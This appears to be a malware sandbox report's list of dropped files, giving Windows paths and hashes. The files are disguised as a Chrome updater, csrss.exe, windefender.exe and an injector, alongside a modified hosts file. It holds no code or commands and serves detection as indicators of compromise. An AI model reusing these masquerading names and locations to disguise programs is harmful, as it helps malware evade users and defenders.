C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9bc110200117a3752313ca2acaf8a9e1
SHA1 fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256 c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA512 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Program Files\Google\Chrome\updater.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9bc110200117a3752313ca2acaf8a9e1
SHA1 fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256 c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA512 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9c260eec9480ce84b15f1f374765472f
SHA1 878893212a4afba68936571299d72d3f368947c4
SHA256 8156da2387bc5c58ca7c32cca44c6d2dbe61fb2a7ea73be6f0673c270521296c
SHA512 a8334295234a90fb816633c0f01ccfaaaa70c64f52be466ff3c9086d2642f40ae7f71e229125c6a61de1c632c844b8c822dd956bc84967cee8dd1bdc672c5db2

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 1ff57801793d3fb22f74fde36f597358
SHA1 4508757a4119e742af662e8590060048d5a3a272
SHA256 f87642f786a8feac8afc599c52dd6629fea175401d1ac2130b9cc407730756be
SHA512 9e98bc7a48fba834442d20df17008d9b033a5dcf2b8e61ecbf85c3fed1eb258401074c62ec4c341b003241114f9516bba2dc5b6d7dc8c70718f747fa430d5be9

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 719b3aaabad247c7e3e168302642b20a
SHA1 503d0a10e62a42195dca3d1e31daf3b6a579dd82
SHA256 36299615fbb6ecae16b918cd91b3b6c20370811a7fa3f4dfb7468cc6148a5028
SHA512 e7d8de2bf0033a076f86018eabcf88e922693cf0be4bf90973e079a9ed0b3cfaa548279168170fae494baadb60f22d5a4d657680af0368f97e1729c9077e4bad

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b868d3f1ad475fe3e603d18c105f20a3
SHA1 5c39dd27afd0e3d7012c7345290728381a36a025
SHA256 aa5e2f5b06b2e4dea8449e92b37ff1c975c8646e6d40725c078bd7cc838134ee
SHA512 4123a31b8136278aa1289a829663badfbf011cbf788d941f8ac99dc4144272292b280cba428536b4f8247a4042c666e36fbf8114356273d4d8415c30b1c345b6

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 8046699a5948cf72713efbf617937062
SHA1 43c8a3fbf1072397acfa1b91d650267386e5e0ec
SHA256 c75f1f7aae2b393cbeeaffd02cdb4647ff2e15c79f4b141e920d5e6b2ccb0b7a
SHA512 ffd6a72189c78b1765774a59623233db66daaeff8ba17f727b1435232395790d13b34723ca0cdc6d4162c0949d159cda2e1b397057aa7bdde7a76009bfddca74

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 20bcfd66dbd06138f4dcfc776e8d2105
SHA1 062c5d034fa1ad72b55c7854ba51fb3497548856
SHA256 9d16786b5e61bd3341b686b15fb9ba35a1646d62e9c23768b3446ce58f9a5e03
SHA512 487c2f6d3d4e105b96001ed1ecd3da2fff44e3356e078d1af4d261956b1fa4368bded645729810dfed3b7047aced1a069836a440b98071b2954aef0563fe9658

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Program Files\Google\Chrome\updater.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474